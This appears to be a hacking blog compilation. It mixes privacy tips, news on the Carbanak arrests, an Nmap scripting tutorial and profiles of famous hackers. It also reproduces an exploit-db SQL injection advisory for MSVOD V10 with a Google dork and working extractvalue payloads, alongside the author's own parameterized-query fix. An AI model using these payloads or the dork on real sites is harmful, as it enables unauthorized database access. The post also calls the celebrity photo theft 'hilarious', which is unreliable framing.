This video tutorial will walk you through creating a BadUSB which will give you a reverse shell. This is the same thing as the USB Rubber Ducky from Hak5, except it's only $3 (the Rubber Ducky is 45 bucks).
- Use Decentralized alternatives.
- Fire up that VPN
- Fortify your browser and your devices
- Utilize Aliases for your own protection
Decentralized alternatives to popular websites are slowly beginning to pop up and gain ground as they get more coverage from various media sources. Alternatives to YouTube and other social networking sites, like DTube, exist. Here is an article listing 4 popular decentralized social media platforms. Entirely decentralized portions of the internet are currently being tested. And of course we have anonymizing darknets such as Tor, Freenet and I2P. However, I would be an idiot not to note that these platforms have had an extremely hard time gaining any sort of traction with their target audience, because they lack the addictive simplicity that services like Instagram, Facebook, and YouTube have. Only time will tell if one of these platforms will gain enough popularity to become a viable alternative to what we currently have.
Get a paid VPN. Securing your connection to the internet is of the utmost importance due to the potential for 3rd-party eavesdroppers and the fact that we really don't know what information is being given away by our internet service providers.
Utilize Tor or some other encrypted peer-to-peer darknet like I2P or Freenet. These systems are for the ultra-paranoid, and I don't really recommend them for the average user who is simply trying to protect themselves preemptively.
Be careful what you download and get an Antivirus. Utilize www.virustotal.com to see if the file you have downloaded shows up on ANY antivirus. You can also use nodistribute.com if you don’t want your scan results sent to the antivirus companies. Protecting yourself from malware can help prevent your privacy from being invaded by governments or people.
Know your rights. Google around to know what the copyright and internet laws are in your area. Be aware of what the government can and cannot do to you legally.
Utilize secure Open Source software and host your own servers. Offshore servers may sometimes be necessary in the absolute worst cases of censorship. Open Source will ensure that no company will be able to revoke access to the software. The government hates open source because they can’t get their backdoors implanted into the code as easily, although it has potentially happened so be aware.
Note: I am speaking about all this in the wake of the recent mass censoring of Alex Jones and Infowars. Regardless of what your political ideology is, everyone deserves to be able to have their ideas heard. In current times, corporate censorship is a new breed altogether. Normally it would be the government, but with big corporate-run media platforms anyone can be censored off the platforms if it serves the corporate interest. I'm no anti-capitalist. Quite the contrary, but I do think we need to push the free market in a direction that prevents censorship. Decentralized platforms and Open Source software can help with this. Stay safe.
Three Ukrainian hackers connected to attacks on over 100 American businesses have been arrested. They used social engineering attacks and phishing attacks to steal financial information from a lot of businesses. These hackers were part of the Carbanak Group.
Frequently the group would send emails disguised as hotel reservations. Said emails would contain malware designed to steal sensitive data.
The Carbanak Group sent an FDA food poisoning related email to a restaurant. They attached a list of “inspections and checks” which the business opened. Of course, the attachment contained malware.
Dmytro Fedorov, Fedir Hladyr and Andrii Kolpakov are being charged with wire fraud, conspiracy, computer hacking, access device fraud, and identity theft. So it looks like jail time is very likely for the Carbanak Group.
How to prevent
What can I do to prevent such an attack on my personal life or business? Social engineering attacks are becoming extremely common today, because they are very easy to create and they tend to have a very high payoff for the hacker. First you need to know what phishing is. Phishing is when a hacker disguises some form of web service, message or other correspondence to make it appear like it's coming from a legitimate source.
So my main advice is to always check the URL. Make sure it is secure (HTTPS) and if it has an SSL certificate that's even better. If you receive an email, always look at the domain of the sender. Any misspellings in the domain can mean that it's fake. If there are attachments, do not open them until you have verification that they are safe. If you cannot get verification that it's from a legitimate source, you can always scan the attachments before opening them, or analyze them within a VM.
Do not give your password away in plaintext, ever. Use a VPN if you're in public, as there are potentially people who could be eavesdropping on public networks (like at a Starbucks or McDonald's Wi-Fi), and install an antivirus on your PC. Also get the antivirus's browser add-on. These add-ons can tell you if the site has been reported as a hacked site or a phishing attack.
I'm going to show you a recent example of XPATH injection from exploit-db. This is a common method you'll have to use when the basic UNION SELECT injection doesn't work and neither does a string injection. It's a bit more tedious because you'll have to use LIMIT most of the time.
Fixing this kind of injection is relatively simple. According to OWASP:
“Just like SQL injection, in order to protect yourself you must escape single quotes (or double quotes) if your application uses them.”
Here is OWASP's article on the XPATH Injection vulnerability. I highly advise reading it in order to understand how to prevent this from happening on your own site. If you're an aspiring penetration tester, this is important to know as well so you can advise your clients.
# Exploit Title: MSVOD V10 - SQL Injection
# Google Dork: inurl:"images/lists?cid=13"
# Date: 2018/07/17
# Exploit Author: Hzllaga
# Vendor Homepage: http://www.msvod.cc/
# Version: MSVOD V10
# CVE : CVE-2018-14418
# Reference: https://www.wtfsec.org/2583/msvod-v10-sql-injection/
/images/lists?cid=13 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version)) desc --
Use LIMIT 0,1, LIMIT 1,1, LIMIT 2,1, etc. to step through the rows one at a time:
?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))--
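The fix, shown as an added example (my own code, not MSVOD's and not from the advisory): a constructed stand-in for the vulnerable endpoint that pastes `cid` into the query text, beside a hardened version that validates the id as an integer and binds it as a parameter. Note that the escaping advice in the OWASP quote above would not stop the payloads above on its own, because neither payload contains a quote character; the parameter is numeric, so it needs type validation or parameterization, which is what this example does.

```python
import re
import sqlite3

# Constructed stand-in for the vulnerable endpoint: the request parameter "cid"
# is pasted straight into the query text, which is what the payload relies on
# (it closes the parenthesis and appends its own ORDER BY clause).
def build_query_unsafe(cid: str) -> str:
    return f"SELECT id, title FROM images WHERE (cid = {cid} ) ORDER BY id"

# Hardened version: "cid" is a numeric id, so it must be all ASCII digits and
# is then bound as a parameter. Escaping quotes would not help here because the
# payload never uses a quote character at all.
def list_images_safe(conn: sqlite3.Connection, cid: str) -> list[tuple[int, str]]:
    if not re.fullmatch(r"[0-9]+", cid):
        raise ValueError(f"cid must be a non-negative integer, got {cid!r}")
    cur = conn.execute(
        "SELECT id, title FROM images WHERE cid = ? ORDER BY id", (int(cid),)
    )
    return cur.fetchall()

def make_sample_db() -> sqlite3.Connection:
    # Constructed sample data, in-memory so the example runs offline.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE images (id INTEGER PRIMARY KEY, cid INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO images (id, cid, title) VALUES (?, ?, ?)",
        [(1, 13, "alpha"), (2, 13, "beta"), (3, 14, "gamma")],
    )
    return conn

# The first payload from the advisory above, as it would arrive in "cid".
PAYLOAD = ("13 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,database(),"
           "0x7c,user(),0x7c,@@version)) desc --")

if __name__ == "__main__":
    conn = make_sample_db()
    print(build_query_unsafe(PAYLOAD))   # attacker-controlled ORDER BY lands in the SQL text
    print(list_images_safe(conn, "13"))  # [(1, 'alpha'), (2, 'beta')]
    try:
        list_images_safe(conn, PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```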
Nmap is THE go-to tool for network mapping. What you might not know is that it also has an absurd amount of power and flexibility, because it also functions as a vulnerability scanner and an exploitation framework! Not only that, but it also doubles as a replacement for netcat, aka the hacker's Swiss army knife. Yep, every recent Nmap installation comes with Ncat, the modernized clone of netcat that supports SSL encryption, making it the more practical of the two in today's age of encryption.
$ ncat 192.168.1.100 80
But wait there’s more!
Nmap now has the Nmap Scripting Engine (NSE). This gives it way more versatility than ever before. None of this is news to a lot of people, I realize, but it's a bit impressive if you take a step back and think about the fact that Nmap started off as a simple port scanner.
To use NSE we must first locate where all the scripts are so we can know what we’ve got as well as where to put new scripts that we might code ourselves and also where to put scripts we’ve taken from the internet.
If you’re on linux just type “locate *.nse”
$ locate *.nse
/usr/share/nmap/scripts/acarsd-info.nse
/usr/share/nmap/scripts/address-info.nse
/usr/share/nmap/scripts/afp-brute.nse
/usr/share/nmap/scripts/afp-ls.nse
/usr/share/nmap/scripts/afp-path-vuln.nse
/usr/share/nmap/scripts/afp-serverinfo.nse
/usr/share/nmap/scripts/afp-showmount.nse
/usr/share/nmap/scripts/ajp-auth.nse
/usr/share/nmap/scripts/ajp-brute.nse
/usr/share/nmap/scripts/ajp-headers.nse
/usr/share/nmap/scripts/ajp-methods.nse
/usr/share/nmap/scripts/ajp-request.nse
/usr/share/nmap/scripts/allseeingeye-info.nse
/usr/share/nmap/scripts/amqp-info.nse
/usr/share/nmap/scripts/asn-query.nse
...
Now we know where the scripts are installed, but how do we use them?
$ nmap -sC TargetNameHere
The above command will run the default scripts against a target (url or IP). The following is an example of how to use a specific script against a target.
$ nmap --script smb-check-vulns 192.168.1.1
Now you know the basics, but the trick is to go out and learn how to write your own scripts. I'll do that in a later tutorial if it's asked for, but in the meantime, go and see if you can find some NSE scripts written by other people. There is a lot that people have accomplished on their own. That's the beauty of open source. One example of this is nmap vulnerability scan on GitHub (link below). They have a script that connects to several regularly updated vulnerability databases and scans from those. Check the GitHub repo for usage and installation instructions. This is a powerful tool, so I leave it in your hands. Don't do anything stupid with it.
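Knowing "what we've got" is easier from the script.db index that ships next to the .nse files (in the same directory `locate *.nse` revealed), since each script is tagged with categories such as safe, intrusive, vuln or default, and `-sC` is simply `--script=default`. The parser below is an added example of my own, not part of Nmap; the sample entries are a constructed excerpt in script.db's real format.

```python
import re
from collections import defaultdict

# Constructed excerpt of script.db (real file: /usr/share/nmap/scripts/script.db on
# most Linux installs). Each Entry line names one script and its categories.
SAMPLE_SCRIPT_DB = """\
Entry { filename = "afp-brute.nse", categories = { "brute", "intrusive", } }
Entry { filename = "afp-ls.nse", categories = { "discovery", "safe", } }
Entry { filename = "ajp-headers.nse", categories = { "discovery", "safe", } }
Entry { filename = "smb-vuln-ms17-010.nse", categories = { "vuln", "safe", } }
Entry { filename = "http-shellshock.nse", categories = { "exploit", "vuln", "intrusive", } }
"""

ENTRY_RE = re.compile(r'filename = "([^"]+)", categories = \{([^}]*)\}')

def parse_script_db(text: str) -> dict[str, list[str]]:
    """Map each category to the script filenames tagged with it, in file order."""
    by_category: dict[str, list[str]] = defaultdict(list)
    for m in ENTRY_RE.finditer(text):
        filename = m.group(1)
        for cat in re.findall(r'"([^"]+)"', m.group(2)):
            by_category[cat].append(filename)
    return dict(by_category)

def scripts_for(text: str, category: str) -> list[str]:
    """Scripts in one category, e.g. what `--script vuln` would select."""
    return parse_script_db(text).get(category, [])

def intrusive_scripts(text: str) -> list[str]:
    """Scripts Nmap itself flags as intrusive: these can crash or alter a service,
    so review this list before running them against anything in production."""
    return scripts_for(text, "intrusive")

if __name__ == "__main__":
    for cat, names in sorted(parse_script_db(SAMPLE_SCRIPT_DB).items()):
        print(f"{cat:10} {', '.join(names)}")
```

Point it at the real file (`open(path).read()`) to inventory an installation, or at a third-party script's directory after you copy its .nse file in and re-run `nmap --script-updatedb` to regenerate the index.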
Kevin Mitnick, a famous white hat hacker, is now a professional security consultant and entrepreneur. Among his exploits are the Pentagon, Nokia, and Motorola. He eventually got convicted and served 5 years in prison. Once he got out he became the rich security consultant we know today. Does crime pay? Perhaps if your reputation precedes you.
Gary McKinnon hacked into 97 U.S. Military and NASA computers during 2001 and 2002. He was looking for information on UFOs and evidence of a conspiracy that the US government was hiding technologies that could solve the energy crisis. He also shut down 1000 government computers and somehow rendered 300 of them inoperable, causing up to $700,000 in damages. Eventually he got caught, but he dodged charges because he was Scottish and they denied his extradition.
Jonathan James AKA c0mrade started hacking as a kid and was the first minor to be arrested and sent to prison at the age of 16. He hacked into the Defense Threat Reduction Agency and NASA. He downloaded source code used for the International Space Station. He committed suicide in 2008 because he was afraid he was going to be wrongfully imprisoned for several attacks on corporate networks that he was under suspicion for.
Adrian Lamo would often hack into media sources and change details on the website. He would then notify the owners of the press source and help them fix their security. However, when he hacked into the New York Times he got arrested. Though later on in life he eventually ended up helping out law enforcement by turning in Chelsea Manning for being a source to WikiLeaks, which he now deeply regrets. Fun fact about Adrian Lamo: he had Asperger syndrome.
Ryan Collins was the hacker (or social engineer, rather) behind "the fappening", a hilarious exploit where Collins used the standard email phishing attack to gain access to celebrity iCloud accounts, where he was then able to obtain a whole bunch of their photos. Many of said photos happened to be sensitive. In fact, they were nude photos of several famous celebrities including Jennifer Lawrence, Kate Upton, and Kirsten Dunst. Several celebrities chose to deny the authenticity of the leaks, including Ariana Grande.
Albert Gonzalez installed a sniffer in various corporate networks and was able to steal millions of users' credit card and ATM details. Apparently he sold about 170 million pieces of sensitive data, resulting in one of the largest cases of identity theft ever.
Astra is said to be a 58-year-old Greek mathematician who hacked into a French corporation called Dassault Group and sold sensitive weapons information to various companies over a period of five years. When authorities caught him in 2008 they never revealed his identity, but just said that he was a 58-year-old Greek mathematician. It just goes to show how versatile a degree in mathematics really is.
Kevin Poulsen stole wiretap info from the FBI, hacked a radio station's phone lines in order to win a Porsche, helped law enforcement catch 744 sex predators over MySpace and is now a senior editor for Wired. How does your resume compare to that?
I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.
You may recognize this quote from the hacker manifesto. This famous manifesto was written by none other than Loyd Blankenship. His writings helped to inspire a generation of hackers to drop the controller and pick up a linux distro. He was a member of the Legion of Doom hacker group and has been hacking since the 70s. You could call him one of the fathers of modern hacking. Whatever you call him, he’s definitely an OG.
Julian Assange started hacking when he was 16. He broke into NASA, the Pentagon, Citibank, Stanford, and Lockheed Martin. His biggest accomplishment was founding WikiLeaks. He is currently in the Ecuadorian Embassy in London trying to prevent his extradition.
What is a hacker? According to Google it is "a person who uses computers to gain unauthorized access to data." But what are the different motives of hackers and how do we define the difference? Hackers are typically divided up into three subcategories. You've got White Hats, Black Hats and Grey Hats.
White Hat: a hacker who hacks legally/ethically for profit or non-profit. Penetration testers, security consultants, computer forensics and incident response teams are just a few examples of the roles that white hats will often play within the public and private sectors. You can usually find them at big tech conventions like Black Hat or DefCon as well as various freelancing websites.
Black Hat: a criminal hacker who hacks illegally for fun, profit, revenge or a whole array of nefarious reasons. These hackers are usually found frequenting various underground forums and IRC channels.
Grey Hat: These hackers are typically harder to pin down. They may or may not be bound by an ethical or legal code but you won’t find them committing malicious crimes. Most hackers fall within black or white hat but there is definitely a spectrum as not all white hats are ethical and not all black hats are criminals.
With that being said guys, there are a whole lot of reasons why hackers start hacking and I couldn’t even hope to list all of them but understand that there is definitely a moral line and a legal line that you have to identify before you do anything you’ll regret.